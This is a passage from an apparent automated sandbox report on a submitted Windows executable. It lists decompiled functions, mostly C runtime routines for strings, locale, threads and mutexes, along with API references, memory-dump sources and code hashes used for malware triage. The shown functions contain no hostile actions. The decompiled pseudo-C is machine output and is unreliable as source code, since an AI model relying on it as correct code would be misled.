                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: 778d8a589536cec45364f94c51d4aa31f90f4a5e5901b61a3e71fb9220615e50
                                                                                                                              • Instruction ID: c0c9491c713d9f3363c8c7629f487dedc9195cfb51453c0b2bb839eeb8314a87
                                                                                                                              • Opcode Fuzzy Hash: 778d8a589536cec45364f94c51d4aa31f90f4a5e5901b61a3e71fb9220615e50
                                                                                                                              • Instruction Fuzzy Hash: 21311231B00265EFDB21DFA5E884ABA7BE0FF00311F94856EE4618B291D334DD40EB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00413330 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 52%
                                                                                                                              			E00413330(void* __ecx, void* __edx, char _a4, char _a8, intOrPtr* _a12) {
				char _v0;
				intOrPtr _v4;
				void* _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t38;
				void* _t51;
				intOrPtr* _t55;
				intOrPtr* _t56;
				signed int _t61;

				_push(0xffffffff);
				_push(E00430D30);
				_push( *[fs:0x0]);
				_t17 =  *0x43a6a8; // 0x2a5cd135
				 *[fs:0x0] =  &_v12;
				_v4 = 0;
				E00408F20(__edx, _a8, _t17 ^ _t61);
				_push( &_a8);
				_v8 = 1;
				_t23 = E00412B80(_v0,  &_a4);
				_t55 = _v8;
				_t51 = InterlockedDecrement;
				_t38 = _t23;
				if(_t55 != 0) {
					_t10 = _t55 + 8; // 0x9
					if(InterlockedDecrement(_t10) == 0) {
						_t32 =  *_t55;
						if(_t32 != 0) {
							_v0(_t32);
						}
						_t33 =  *((intOrPtr*)(_t55 + 4));
						_t66 = _t33;
						if(_t33 != 0) {
							_push(_t33);
							L0041B408(_t38, _t51, _t55, _t66);
							_t61 = _t61 + 4;
						}
						_push(_t55);
						L0041A97D(_t38, _t51, _t55, _t66);
						_t61 = _t61 + 4;
					}
				}
				_t56 = _a12;
				if(_t56 != 0 && InterlockedDecrement(_t56 + 8) == 0) {
					_t26 =  *_t56;
					if(_t26 != 0) {
						_v0(_t26);
					}
					_t27 =  *((intOrPtr*)(_t56 + 4));
					_t70 = _t27;
					if(_t27 != 0) {
						_push(_t27);
						L0041B408(_t38, _t51, _t56, _t70);
						_t61 = _t61 + 4;
					}
					_push(_t56);
					L0041A97D(_t38, _t51, _t56, _t70);
					_t61 = _t61 + 4;
				}
				 *[fs:0x0] = _v12;
				return _t38;
			}






















                                                                                                                              0x00413330
                                                                                                                              0x00413332
                                                                                                                              0x0041333d
                                                                                                                              0x00413342
                                                                                                                              0x0041334e
                                                                                                                              0x0041335f
                                                                                                                              0x00413367
                                                                                                                              0x00413374
                                                                                                                              0x0041337d
                                                                                                                              0x00413382
                                                                                                                              0x00413387
                                                                                                                              0x00413393
                                                                                                                              0x00413399
                                                                                                                              0x0041339b
                                                                                                                              0x0041339d
                                                                                                                              0x004133a5
                                                                                                                              0x004133a7
                                                                                                                              0x004133ab
                                                                                                                              0x004133ae
                                                                                                                              0x004133ae
                                                                                                                              0x004133b0
                                                                                                                              0x004133b3
                                                                                                                              0x004133b5
                                                                                                                              0x004133b7
                                                                                                                              0x004133b8
                                                                                                                              0x004133bd
                                                                                                                              0x004133bd
                                                                                                                              0x004133c0
                                                                                                                              0x004133c1
                                                                                                                              0x004133c6
                                                                                                                              0x004133c6
                                                                                                                              0x004133a5
                                                                                                                              0x004133c9
                                                                                                                              0x004133cf
                                                                                                                              0x004133db
                                                                                                                              0x004133df
                                                                                                                              0x004133e2
                                                                                                                              0x004133e2
                                                                                                                              0x004133e4
                                                                                                                              0x004133e7
                                                                                                                              0x004133e9
                                                                                                                              0x004133eb
                                                                                                                              0x004133ec
                                                                                                                              0x004133f1
                                                                                                                              0x004133f1
                                                                                                                              0x004133f4
                                                                                                                              0x004133f5
                                                                                                                              0x004133fa
                                                                                                                              0x004133fa
                                                                                                                              0x00413403
                                                                                                                              0x00413412

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00408F20: _com_util::ConvertStringToBSTR.COMSUPP ref: 00408F74
                                                                                                                                • Part of subcall function 00412B80: SysStringLen.OLEAUT32(?), ref: 00412BD8
                                                                                                                              • InterlockedDecrement.KERNEL32(00000009), ref: 004133A1
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004133AE
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004133D5
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004133E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$DecrementFreeInterlocked$Convert_com_util::
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3913665864-0
                                                                                                                              • Opcode ID: b605ac03266d94012cd59b43c336421778ee48a0f93470d1031f04eab0f13e7f
                                                                                                                              • Instruction ID: 682b338d3e4034afe0c842c50563cd228af7a5d7c4af0e6d2b7b3f58785ed1da
                                                                                                                              • Opcode Fuzzy Hash: b605ac03266d94012cd59b43c336421778ee48a0f93470d1031f04eab0f13e7f
                                                                                                                              • Instruction Fuzzy Hash: 802182B26043055BD710DF65DC41F9BB3DCAB48B54F040A2EF859E3340EB38EA448AAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097485F Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,?,009785C7,?,00000001,00975F38,?,0097844E,00000001,?,?,?,0097604C,?,?), ref: 00974864
                                                                                                                              • _free.LIBCMT ref: 009748C1
                                                                                                                              • _free.LIBCMT ref: 009748F7
                                                                                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0097844E,00000001,?,?,?,0097604C,?,?,?,00983AB0,0000002C,00975F38), ref: 00974902
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2283115069-0
                                                                                                                              • Opcode ID: 87f8150af092cb59758e1ff75d879c19cfc59fbfe87c9469acaa04ce7d0a782d
                                                                                                                              • Instruction ID: 25c39c5b05700f44b1c5602d0da5d75e3e87939d31cafa0ea0f40f8b24a436da
                                                                                                                              • Opcode Fuzzy Hash: 87f8150af092cb59758e1ff75d879c19cfc59fbfe87c9469acaa04ce7d0a782d
                                                                                                                              • Instruction Fuzzy Hash: AD11C2332146452B97112B786C85B7B269D9FC17B8B39C634F62C932E3EB758C006256
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009749B6 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,?,00976497,009765BE,?,?,0096FB64,?,?,00962B95,00000020,?), ref: 009749BB
                                                                                                                              • _free.LIBCMT ref: 00974A18
                                                                                                                              • _free.LIBCMT ref: 00974A4E
                                                                                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00976497,009765BE,?,?,0096FB64,?,?,00962B95,00000020,?), ref: 00974A59
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2283115069-0
                                                                                                                              • Opcode ID: 5c26894b9d6e56dd35b4f4f86c7bfffd8af5999275aa436d31e74acd801b6cc4
                                                                                                                              • Instruction ID: d7204212ed91ab24ff78e8393bf112a6f2dfd973f79c19da5b1fbb8e78b4e0f0
                                                                                                                              • Opcode Fuzzy Hash: 5c26894b9d6e56dd35b4f4f86c7bfffd8af5999275aa436d31e74acd801b6cc4
                                                                                                                              • Instruction Fuzzy Hash: AA1108332585016BD7156B786C86F3B259D9BC17B873A8234F22C932E3EF758C0063A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004233C2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004233C2(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00422CBF(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00422DAB(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004232CA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00423211(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                                              0x004233c2
                                                                                                                              0x004233c5
                                                                                                                              0x004233cb
                                                                                                                              0x0042343e
                                                                                                                              0x00000000
                                                                                                                              0x004233d2
                                                                                                                              0x004233d2
                                                                                                                              0x004233d5
                                                                                                                              0x004233f0
                                                                                                                              0x004233f3
                                                                                                                              0x00423413
                                                                                                                              0x00423425
                                                                                                                              0x004233f5
                                                                                                                              0x004233f5
                                                                                                                              0x004233f8
                                                                                                                              0x00000000
                                                                                                                              0x004233fa
                                                                                                                              0x0042340c
                                                                                                                              0x0042340c
                                                                                                                              0x004233f8
                                                                                                                              0x00423443
                                                                                                                              0x00423447
                                                                                                                              0x004233d7
                                                                                                                              0x004233ef
                                                                                                                              0x004233ef
                                                                                                                              0x004233d5

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                              • Instruction ID: 9f2add9926d8dade40ae356396ae19c8fd7d5fa9655fc9f841ea35ef3cd838e4
                                                                                                                              • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                              • Instruction Fuzzy Hash: EB01833210005EBBCF126E95EC01CEE3F72BF18349B848456FE1859131D63ACA72AB85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420743 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E00420743(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x438f38);
				E00421294(__ebx, __edi, __esi);
				_t31 = E0042024C(__edx, __edi, _t35);
				_t15 =  *0x43add8; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004240A7(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x43ace0; // 0x2271608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x43a8b8;
								if(__eflags != 0) {
									_push(_t33);
									E0041BDF6(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x43ace0; // 0x2271608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x43ace0; // 0x2271608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004207DE();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00420F77(_t25, _t29, _t31, 0x20);
				}
				return E004212D9(_t33);
			}










                                                                                                                              0x00420743
                                                                                                                              0x00420743
                                                                                                                              0x00420743
                                                                                                                              0x00420743
                                                                                                                              0x00420745
                                                                                                                              0x0042074a
                                                                                                                              0x00420754
                                                                                                                              0x00420756
                                                                                                                              0x0042075e
                                                                                                                              0x0042077f
                                                                                                                              0x00420785
                                                                                                                              0x00420789
                                                                                                                              0x0042078c
                                                                                                                              0x0042078f
                                                                                                                              0x00420795
                                                                                                                              0x00420797
                                                                                                                              0x00420799
                                                                                                                              0x0042079c
                                                                                                                              0x004207a2
                                                                                                                              0x004207a4
                                                                                                                              0x004207a6
                                                                                                                              0x004207ac
                                                                                                                              0x004207ae
                                                                                                                              0x004207af
                                                                                                                              0x004207b4
                                                                                                                              0x004207ac
                                                                                                                              0x004207a4
                                                                                                                              0x004207b5
                                                                                                                              0x004207ba
                                                                                                                              0x004207bd
                                                                                                                              0x004207c3
                                                                                                                              0x004207c7
                                                                                                                              0x004207c7
                                                                                                                              0x004207cd
                                                                                                                              0x004207d4
                                                                                                                              0x00420766
                                                                                                                              0x00420766
                                                                                                                              0x00420766
                                                                                                                              0x0042076b
                                                                                                                              0x0042076f
                                                                                                                              0x00420774
                                                                                                                              0x0042077c

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0042024C: __amsg_exit.LIBCMT ref: 0042025A
                                                                                                                              • __amsg_exit.LIBCMT ref: 0042076F
                                                                                                                              • __lock.LIBCMT ref: 0042077F
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0042079C
                                                                                                                              • InterlockedIncrement.KERNEL32(02271608), ref: 004207C7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4129207761-0
                                                                                                                              • Opcode ID: 43e40e8e65a1d05093c37d24fd0ad4863d290544479b3d4f3ea53a4ce714b793
                                                                                                                              • Instruction ID: c197ffa17f231d6c2359fa7736c51cda35cdcad39fd10cf4366f04bdbc48d73b
                                                                                                                              • Opcode Fuzzy Hash: 43e40e8e65a1d05093c37d24fd0ad4863d290544479b3d4f3ea53a4ce714b793
                                                                                                                              • Instruction Fuzzy Hash: 76018B31B407319BC725AB2AA84975E73E0BF84754F90105BF810A76A2DB7C6841CFDE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004201D5 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E004201D5(void* __ebx) {
				void* __edi;
				void* __esi;
				long _t3;
				void* _t9;
				long _t12;
				long _t20;
				long* _t21;

				_t3 = GetLastError();
				_push( *0x43a8b0);
				_t20 = _t3;
				_t21 =  *((intOrPtr*)(E004200A7()))();
				if(_t21 == 0) {
					_t21 = E0041D4C9(1, 0x214);
					if(_t21 != 0) {
						_push(_t21);
						_push( *0x43a8b0);
						_t9 =  *((intOrPtr*)(E00420030( *0x43c164)))();
						_t24 = _t9;
						if(_t9 == 0) {
							_push(_t21);
							E0041BDF6(__ebx, _t20, _t21, __eflags);
							_t21 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t21);
							E00420116(__ebx, _t20, _t21, _t24);
							_t12 = GetCurrentThreadId();
							_t21[1] = _t21[1] | 0xffffffff;
							 *_t21 = _t12;
						}
					}
				}
				SetLastError(_t20);
				return _t21;
			}










                                                                                                                              0x004201d7
                                                                                                                              0x004201dd
                                                                                                                              0x004201e3
                                                                                                                              0x004201ec
                                                                                                                              0x004201f0
                                                                                                                              0x004201fe
                                                                                                                              0x00420204
                                                                                                                              0x00420206
                                                                                                                              0x00420207
                                                                                                                              0x00420219
                                                                                                                              0x0042021b
                                                                                                                              0x0042021d
                                                                                                                              0x00420237
                                                                                                                              0x00420238
                                                                                                                              0x0042023e
                                                                                                                              0x0042023e
                                                                                                                              0x0042021f
                                                                                                                              0x0042021f
                                                                                                                              0x00420221
                                                                                                                              0x00420222
                                                                                                                              0x00420229
                                                                                                                              0x0042022f
                                                                                                                              0x00420233
                                                                                                                              0x00420233
                                                                                                                              0x0042021d
                                                                                                                              0x00420204
                                                                                                                              0x00420241
                                                                                                                              0x0042024b

                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?,?,?,0041AD79,0042007A,?,0041AD79,004011F3), ref: 004201D7
                                                                                                                                • Part of subcall function 004200A7: TlsGetValue.KERNEL32(00000000,004201EA,?,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?,?,?,0041AD79,0042007A), ref: 004200AE
                                                                                                                                • Part of subcall function 004200A7: TlsSetValue.KERNEL32(00000000,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?,?,?,0041AD79,0042007A,?,0041AD79,004011F3), ref: 004200CF
                                                                                                                              • __calloc_crt.LIBCMT ref: 004201F9
                                                                                                                                • Part of subcall function 0041D4C9: __calloc_impl.LIBCMT ref: 0041D4D7
                                                                                                                                • Part of subcall function 0041D4C9: Sleep.KERNEL32(00000000,?,0041AD79,004011F3,?,004011F3,?), ref: 0041D4EE
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(?,0042051E,0041CAAE,0041AD79,?,0041AD79,004011F3,?,004011F3,?), ref: 0042003D
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(00000006,?,0041AD79,004011F3,?,004011F3,?), ref: 00420054
                                                                                                                                • Part of subcall function 00420116: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00438EF0,0000000C,00420227,00000000,00000000,?,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?), ref: 00420127
                                                                                                                                • Part of subcall function 00420116: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0042015B
                                                                                                                                • Part of subcall function 00420116: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042016B
                                                                                                                                • Part of subcall function 00420116: InterlockedIncrement.KERNEL32(0043A8B8), ref: 0042018D
                                                                                                                                • Part of subcall function 00420116: __lock.LIBCMT ref: 00420195
                                                                                                                                • Part of subcall function 00420116: ___addlocaleref.LIBCMT ref: 004201B4
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00420229
                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?,?,?,0041AD79,0042007A,?,0041AD79), ref: 00420241
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1081334783-0
                                                                                                                              • Opcode ID: 2702377a57130617bd783c725e71144d63ed137ed38c0d13a8454f374c30a90a
                                                                                                                              • Instruction ID: 858f834f6995529fefb430ca5921dffb912a4e68fee820407e0b98a0decd74d8
                                                                                                                              • Opcode Fuzzy Hash: 2702377a57130617bd783c725e71144d63ed137ed38c0d13a8454f374c30a90a
                                                                                                                              • Instruction Fuzzy Hash: 5AF04F32605631AAD73A37767C0AB5B7AE49F017A0B20012BF644962A2CE69D841D6AD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040E220 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040E220(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x18)) == 0) {
					 *(_t23 + 0x18) = CreateMutexW(0, 0, 0);
				}
				if(WaitForSingleObject( *(_t23 + 0x18), 0xffffffff) == 0) {
					_t12 =  *0x43bdf8; // 0x0
					_t13 = _t12 - 1;
					 *0x43bdf8 = _t13;
					if(_t13 <= 0 &&  *(_t23 + 4) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t23 + 8))))();
						FreeLibrary( *(_t23 + 4));
						 *(_t23 + 4) = 0;
					}
				}
				return ReleaseMutex( *(_t23 + 0x18));
			}






                                                                                                                              0x0040e221
                                                                                                                              0x0040e227
                                                                                                                              0x0040e235
                                                                                                                              0x0040e235
                                                                                                                              0x0040e246
                                                                                                                              0x0040e248
                                                                                                                              0x0040e24d
                                                                                                                              0x0040e252
                                                                                                                              0x0040e257
                                                                                                                              0x0040e266
                                                                                                                              0x0040e26c
                                                                                                                              0x0040e272
                                                                                                                              0x0040e272
                                                                                                                              0x0040e257
                                                                                                                              0x0040e284

                                                                                                                              APIs
                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,00410CF7), ref: 0040E22F
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00410CF7), ref: 0040E23E
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E26C
                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 0040E27D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Mutex$CreateFreeLibraryObjectReleaseSingleWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1123450414-0
                                                                                                                              • Opcode ID: efb20484131fa9ff8ca72f8548e9e184fba1f18cf243de5c2c3346743247d507
                                                                                                                              • Instruction ID: a858165c47edf6ad07f79bc828942a6fc8de13c3e5e102e88321312c6d3333b6
                                                                                                                              • Opcode Fuzzy Hash: efb20484131fa9ff8ca72f8548e9e184fba1f18cf243de5c2c3346743247d507
                                                                                                                              • Instruction Fuzzy Hash: 9CF01970200710CFD7348F6AED48B0677F5AB98711F105A2EE696977E0C774E888CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00979CB6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00979988,?,00000001,?,00000001,?,009789DB,?,?,00000001), ref: 00979CCD
                                                                                                                              • GetLastError.KERNEL32(?,00979988,?,00000001,?,00000001,?,009789DB,?,?,00000001,?,00000001,?,0097846F,0097604C), ref: 00979CD9
                                                                                                                                • Part of subcall function 00979D2A: CloseHandle.KERNEL32(FFFFFFFE,00979CE9,?,00979988,?,00000001,?,00000001,?,009789DB,?,?,00000001,?,00000001), ref: 00979D3A
                                                                                                                              • ___initconout.LIBCMT ref: 00979CE9
                                                                                                                                • Part of subcall function 00979D0B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00979CA7,00979975,00000001,?,009789DB,?,?,00000001,?), ref: 00979D1E
                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00979988,?,00000001,?,00000001,?,009789DB,?,?,00000001,?), ref: 00979CFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2744216297-0
                                                                                                                              • Opcode ID: b0c45f3f697f0e5c48d4ad3f418c0f5313381318ccd3015251fb90df847c7d0e
                                                                                                                              • Instruction ID: 320371e1d98c18744c2b161047c8d65a52e6b28c2a74362e1fa1ae0dfe810788
                                                                                                                              • Opcode Fuzzy Hash: b0c45f3f697f0e5c48d4ad3f418c0f5313381318ccd3015251fb90df847c7d0e
                                                                                                                              • Instruction Fuzzy Hash: 1DF01537514119BBCF222FE5EC08A8A3F66EF4A3A1B008010FA0996261D632C820EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004070B0 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004070C2
